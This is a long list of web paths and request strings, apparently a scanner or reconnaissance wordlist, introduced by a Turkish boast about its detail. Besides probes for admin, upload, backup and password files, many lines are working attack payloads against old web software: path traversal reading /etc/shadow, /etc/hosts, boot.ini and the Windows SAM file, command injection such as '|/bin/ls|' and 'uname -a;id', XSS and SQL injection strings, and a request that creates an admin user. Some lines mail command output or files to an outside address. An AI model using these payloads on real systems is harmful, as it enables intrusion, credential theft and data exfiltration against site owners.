başka hiçbiryerde bu kdr ayrıntılı bulamazsınız............
/Admin_files/
/DMR/
/StoreDB/
/WebShop/
/WebTrend/
/Web_store/
/webEdition/
/webedition/
/access/
/cms/
/cmsx/
/cmsx/upload.php
/cms/fileadmin/
/cms/fileadmin/log.txt
/account/
/accounting/
/administrator/
/ConsoleHelp/
/console/
/app/
/apps/
/archive/
/wi/
/wi/bin/
/system/
/system/bin/
/system/bin/upload/
/system/bin/binbackoffice/
/backoffice/
/bin/
/asp/
/demo/
/demonstration/
/atc/
/backup/
/bak/
/opt/
/opt/setupt/
/beta/
/bin/
/buy/
/buynow/
/c/
/cart/
/ccard/
/counter/
/credit/
/customers/
/userdata/
/Search
/~Account%20Name/Search
/snmpinit
/dat/
/data/
/chat/data/
/chat/data/usr/
/database/
/db/
/dbase/
/doc-html/
/docs/
/down/
/download/
/downloads/
/aspSmartUpload/
/cmsupload/
/cmsuploads/
/cms-uploads/
/cms-up/
/cmsup/
/img_upl/
/img_upload/
/images_upload/
/images_upl/
/upload-docs/
/upload-documents/
/upload-files/
/uploadfiles/
/uploadtemp/
/upload-temp/
/uploadtmp/
/upload-tmp/
/admin/dateiupload.php
/admin/dateiverwaltung.php
/dateiverwaltung.php
/dateiupload.php
/tmpupload/
/tempupload/
/tmp-upload/
/temp-upload/
/upload2.htm
/upload2.html
/upload/
/uploads/
/upload/
/uploading/
/employees/
/wartung/
/support/
/exe/
/file/
/files/
/forum/
/fpadmin/
/ftp/
/ftpfiles/
/guestbook/
/guests/
/home/
/htdocs/
/html/
/ibill/
/idea/
/ideas/
/incoming/
/info/
/install/
/installfiles/
/install-files/
/intranet/
/intra/
/jave/
/jdbc/
/lib/
/library/
/login/
/log/
/logfiles/
/mail/
/mall_log_files/
/manual/
/marketing/
/msql/
/new/
/newfiles/
/old/
/oldfiles/
/odbc/
/old/
/oracle/
/postgres/
/postgresql/
/order/
/orders/
/outgoing/
/pages/
/password/
/passwords/
/perl/
/private/
/pub/
/public/
/purchase/
/purchases/
/pw/
/register/
/registered/
/reseller/
/retail/
/root/
/sales/
/setup-files/
/setup_files/
/setup/
/shop/
/shopper/
/site/iissamples/
/software/
/source/
/src/
/srcfiles/
/sql/
/support/
/tmp/
/tmpfiles/
/temp/
/tempfiles/
/test/
/testfiles/
/tst/
/tstfiles/
/tstsite/
/testsite/
/test-cgi/
/tools/
/tree/
/updates/
/usage/
/user/
/users/
/web/
/web800fo/
/webadmin/
/board/docs/
/webboard/
/webdata/
/website/
/www/
/www-sql/
/wwwjoin/
/import/
/zipfiles/
/zip/
/zips/
/session/
/session.jsp
/session.jhtml
/session.php
/session.phps
/session.asp
/session.aspx
/session.pl
/cgi-bin/session.pl
/cgi-bin/xxxnonexistingyy.pl
/cgi-bin/xxxnonexistingyy.exe
/cgi-bin/xxxnonexistingyy.bat
/cgi-bin/xxxnonexistingyy.jsp
/session.py
/sessions
/sessions.jsp
/sessions.jhtml
/sessions.php
/sessions.phps
/sessions.asp
/sessions.aspx
/sessions.pl
/cgi-bin/sessions.pl
/sessions.py
/cgi-bin/
/cgi-local/
/cgi-win/
/cgi-home/
/cgi/
/dyn/
/dynamic/
/sbin/
/include/
/includes/
/inc/
/java/
/config/
/admin/
/_admin/
/__admin/
/Admin/
/./admin/
/administration/
/Administration/
/info/
/stat/
/stats/
/status/
/express/cache/
/usage/
/private/
/priv/
/internal/
/priv/
/shtml/
/debug.txt
/debug.log
/dbg.txt
/dbg.log
/xsql/java/demo/
/../../shadow
/remote_login.pl%20
/WebSTAR%20LOG
/index.search
/.dS_store
/webstar.log
/logs/webstar.log
/pi_admin.admin
/test.php3
/info.php3
/ptsite/news.inc
/news.inc
/objcheck.asp
/scripts/objcheck.asp
/include/sql.php
/include/sql.inc
/include/db.inc
/include/news.inc
/include/database.inc
/include/data.inc
/include/functions.inc
/inc/sql.inc
/inc/sql.inc
/inc/db.inc
/inc/database.inc
/inc/data.inc
/inc/functions.inc
/inc/news.inc
/inc/test.php
/include/test.php
/extras/quicklist.php?bn=krasl
/cgi-bin/test.php3
/cgi-bin/web2mail.cgi
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/%3f.jsp
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/index.jsp::$DATA
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/*.jsp::$DATA/
/servlet//..//../o.jsp
/wl_management_internal2/
/wl_management_internal2/wl_management
/servlet/wl_management
/servlets/wl_management
/wl_management?x=y
/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
/a.jsp//..//..//..//..//..//../winnt/win.ini
/ConsoleHelp/
/*.shtml/
/*.shtml/login.jsp
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/.../
/\.../
/iisadmpwd/
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iisadmpwd/_AuthChangeUrl
/_AuthChangeUrl
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/docs/CodeBrws.asp
/iissamples/sdk/asp/interaction/ServerVariables_JScript.asp
/iissamples/sdk/asp/interaction/ServerVariables_VBScript.asp
/iissamples/
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/_vti_bin/_vti_aut/fp30reg.dll
/global.asax
/global.asax.cs
/global.asa
/global.asa::$DATA
/global.asa+.htr
/global.asa%3f.htr
/global.asa%3f.jsp
/global.asa\
/global.asa%20.pl
/default.asp+.htr
/default.asp%3f.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/AdSamples/config/site.csc
/siteserver/publishing/viewcode.asp?source=/tata.asp
/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/Admin/knowledge/dsmgr/users/GroupManager.asp
/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/_mem_bin/auoconfig.asp
/_mem_bin/remind.asp
/scripts/cphost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/scripts/cpshost.dll?my_file=localthing&TargetURL=/Sites/Publishing/srvname/ldap_anonymous/
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/php/index.php
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/test-cgi.bat
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/perl/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/scripts/perl.exe
/scripts/perl
/cgi-bin/perl
/scripts/*.pl
/cgi-bin/gbadmin.cgi?action=setup
/guestbook/gbadmin.cgi?action=setup
/gbook/gbadmin.cgi?action=setup
/guest/gbadmin.cgi?action=setup
/cgi-bin/guestbook/passwd
/cgi-bin/guestbook/passwd.txt
/cgi-bin/guestbook/passwd.dat
/cgi-bin/guestbook/passwd.db
/guestbook/passwd
/guestbook/passwd.txt
/guestbook/passwd.dat
/guestbook/passwd.db
/wwwboard/passwd.txt
/files/passwd
/files/passwd.txt
/files/passwd.dat
/files/passwd.db
/files/pwd
/files/pwd.txt
/files/pwd.dat
/files/pwd.db
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/rguest.exe
/scripts/rguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/search.asp
/scripts/search.asp
/search.asp
/cgi-bin/campas
/cgi-bin/view-source
/source?v=../../../../../../../etc/hosts%00
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/s97is.vts?action=View&VdkVgwKey=%2Fetc%2fhosts&doctype=raw&Collection=
/search97/s97_cgi.exe
/search/s97_cgi.exe
/search97/search97.vts
/search/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
/search/s97.vts?Action=FormGen&ServerKey=Primary&Template=
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/webadmin.ntf
/homepage.nsf
/webadmin.nsf
/statref.nsf
/setup.nsf
/setupweb.nsf
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/events4.nsf
/webadmin.nsf
/decsadm.nsf
/admin4.ntf
/admin4.nsf
/mailbox.ntf
/mailbox.nsf
/agentrunner.ntf
/agentrunner.nsf
/mailw46.nsf
/mailw46.ntf
/collect4.nsf
/collect4.ntf
/cersvr.nsf
/events4.nsf
/mab.nsf
/ntsync4.nsf
/ntsync4.ntf
/user_settings.cfg
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/env.pl
/cgi/env.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/CFDOCS/exampleapps/
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/mall_log_files/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pw/storemgr.pw
/quikstore.cfg
/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
/shopper.exe?display=action&template=order.log
/orders/mountain.cfg
/orders/orders.txt
/Admin_files/order.log
/merchants/admin.pw
/store/index.php?cat_id=’
/store/tmp/
/store/temp/
/store/customers/
/store/temp_customers/
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/admin.pl
/cgi-bin/admin.exe
/samples/view- source?filename=anotherone
:8080/samples/view- source?filename=anotherone
:8888/samples/view- source?filename=anotherone
:8888/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:2082/login/?user=_cmd_with_pipes_and_backticks
:4274/../../../../../WINNT/repair/sam
/login/?user=_cmd_with_pipes_and_backticks
:4080/?KerioFW
:9495/
:1984
:7273/?dellopenmanage
:8009/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:8081/
:8080/\../readme.txt
:5000/
:2301
:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
:3128/../../../../
:9090
:901
:8383
:8383/1111/readmail.cgi?uid=user1&mbx=../test/Main
:800/../..\
:800/C:/
:7464/
:12000
:9090///
:2301/Proxy/LoginResponse
:8888/surf/scwebusers
:8888/SimpleBar.dll/RunReport
:9090/apps/web/vs_diag.cgi?server=_XSS_
:6680/user.cgi?cmd=xssthings&utoken=
:8089/tools/ftgatedump.fts
:8089/tools/ftgatedump.fts?command=1
:8000/admin/reports/alertlist.mml
:80/admin/reports/alertlist.mml
:8025/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:8081/admin/reports/alertlist.mml
:9000/admin/reports/alertlist.mml
:8888/admin/reports/alertlist.mml
:85/waadmin.wa
10000:/dansguardian/edit.cgi?file=xxx
/waadmin.wa
:81/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28’XSS’%29% 3B</script>
/cgi-bin/.cobalt/message/message.cgi?info=**********alert%28’XSS’%29% 3B</script>
8443:/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
/plugins/hpjwja/script/devices_update_printer_fw_upload.hts
8443/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/plugins/hpjdwm/script/test/setinfo.hts?setinclude=../../../../../../../boot.ini
/frontend/x/cpanelpro/ignorelist.html?account=">**********alert(’Vulnerable’)</script>
/frontend/x/cpanelpro/showlog.html?account=**********alert(’Vulnerable’) </script>
/frontend/x/sql/repairdb.html?db=**********alert(’Vulnerable’)</script>
/frontend/x/ftp/doaddftp.html?login=">**********alert(’Vulnerable’)</script>
/tools/ftgatedump.fts
/tools/ftgatedump.fts?command=1
/adsamples/config/site.csc
/iissamples/exair/HowItWorks/CodeBrws.asp
/samples/Search/queryhit.htm
/iissamples/sdk/asp/docs/codebrws.asp
/AdvWorks/equipment/catalog_type.asp
/scripts/repost.asp
/scripts/upload.asp
/scripts/uploadx.asp
/cgi-bin/upload_pdf.exe
/cgi-bin/upload_pic.exe
/cgi-bin/upload.exe
/scripts/upload.exe
/scripts/cgi-bin/upload.exe
/scripts/uploadn.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/rwwwshell.pl
/~/
/~root/
/~admin/
/~nobOdy/
/~www/
/~wwwrun/
/~bin/
/~guest/
/~log/
/~logs/
/~lp/
/~named/
/~test/
/~tmp/
/cgi-bin/imagemap.exe
/../../../../config.sys
/../webserver.ini
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst.bat
/cgi-bin/tst2.bat
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat
/cgi-bin/get32.exe
/cgi-bin/tst.bat
/cgi-bin/alibaba.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
/WEB-INF./web.xml
/WEB-INF/web.xml
/signon?admin=admin&maybe_tivoli
:8000//
:8000//welcome.jsp
:8080/../examples//WEB-INF/../../../../../
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
:8500/CFIDE/probe.cfm
:8080/web-console/ServerInfo.jsp%00
//admin//user.pl
:8080//admin//user.pl
/web-console/ServerInfo.jsp%00
:8080/web-console/
/web-console/
/cgi-bin/auto_ftp.pl
/auto_ftp.pl
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/cgitest.exe
/cgi-bin/cgitest.htm
/cgi-bin/cgitest.pl
/cgi-bin/cgitest.sh
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/view_all_bug_page.php
/bugs/view_all_bug_page.php
/bugtrack/view_all_bug_page.php
/mantis/view_all_bug_page.php
/mantis/login_page.php?g_****_include_file=every_file
/bugs/login_page.php?g_****_include_file=every_file
/bug/login_page.php?g_****_include_file=every_file
/bugtrack/login_page.php?g_****_include_file=every_file
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/webwho.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/FormMail.cgi
/cgi-bin/formmail.cgi
/cgi-bin/formmail.asp
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/chformmail.pl
/cgi-bin/formmailET.pl
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.pl?s=path&c=txt&f=fn
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/samples/adctest.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/cgi-bin/plusmail
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/iishelp/iis/misc/iirturnh.htw
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/WS_FTP.LOG
/log/WS_FTP.LOG
/logs/WS_FTP.LOG
/cgi-bin/Ultimate.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/forums/dcboard.cgi
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/ubb/register.php
/cgi-bin/postings.cgi
/cgi-bin/core
/.HTACCESS.
/%2esharelock
/%2eHTACCESS
/%2ehtaccess
/%2ehtpasswd
/cgi-bin/echo
/cgi-bin/echo2
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch.cgi?exclude=%60%60
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/loadpage.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/postcard.pl
/cgi-bin/.fhp
/cgi-bin/clickresponder.pl
/cgi-bin/responder.cgi
/cgi-win/uploader.exe
/upload/uploader.php
/upload/upload.php
/uploader.php
/upload.php
/cgi-bin/uploadn.asp
/cgi-bin/upload.asp
/cgi-bin/excite
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/ping
/jsp/source.jsp
/jsp/upload.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/ccbill/whereami.cgi?g=cat+../../../../etc/hosts
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/c32web.exe/ChangeAdminPassword
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.pl
/cgi-bin/allmanage.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/ads.cgi
/cgi-bin/admin.cgi
/ads/admin.cgi
/cgi-bin/adpassword.txt
/cgi-bin/ads/adpassword.txt
/cgi-bin/banner/adpassword.txt
/cgi-bin/banner/data/adpassword.txt
/password.inc
/password.txt
/password.db
/password.dat
/ads/adpassword.txt
/banner/adpassword.txt
/banner/dat/adpassword.txt
/banner/data/adpassword.txt
/webres/discuss/passwd.txt
/discuss/passwd.txt
/files/passwd.txt
/admin/admin.php
/guestbook/admin.php
/guestbook/files/passwd.txt
/gaestebuch/files/passwd.txt
/cgi-bin/infosrch.cgi
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
/source.jsp
:8987/sawmill?rfcf+“/etc/passwd“+spbn+1*1*21*1*1*1*1*1*1*1*1*1+3
/cgi-bin/sawmill5?rfcf+“/etc/passwd“+spbn+1*1*21*1*1*1*1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/db/info.php
/poll/db/info.php
/poll/textfile/info.php
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/. color=#22229cwww.my.cnf
/globals.pl
/cgi-bin/. color=#22229cwww.my.cnf
/cgi-bin/futureforum.cgi
/cgi-bin/futureforum3.cgi
/forum/index.php?act=Search&nav=lv&CODE=show&searchid=valid_session_id&search_in=topics&result_type=topics&hl=&st=20_sql_things/*
/examples/applications/bboard/bboard_frames.html
/level/99/exec/show/config
/level/15/exec/show/config
/level/1/exec/show/config
/level/0/exec/show/config
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cwmail.ini
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/examples/servlet/SnoopServlet
/servlet/FileDistributionServlet
/servlets/weblogic.management.servlet.FileDistributionServle t
:2602
:8080/examples/servlet/SnoopServlet
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
:8080/%2e%2e/%2e%2e/%00.jsp
/.%2e/.%2e/.%2e/winnt/repair/sam._
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/[email protected]&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/[email protected]&FileName=mailfile:c&Subject=tst&[email protected]
/cgi-bin/mailfile.cgi?real_name=rc&[email protected]&filename=mailfile.cgi
/cgi-bin/[email protected]&[email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/..../
/~nobOdy/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
/dbconfig.inc
/config.inc
/cfg.inc
/include/config.inc
/inc/db.inc
/inc/odbc.inc
/db.inc
/dba.inc
/data.inc
/odbc.inc
/config.inc
/global.inc
/./../main.conf
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php?op=login&pwd=123&aid=Admin’sqlthings
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/servlets/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlets/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%[email protected]
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru(’/bin/ls’)."
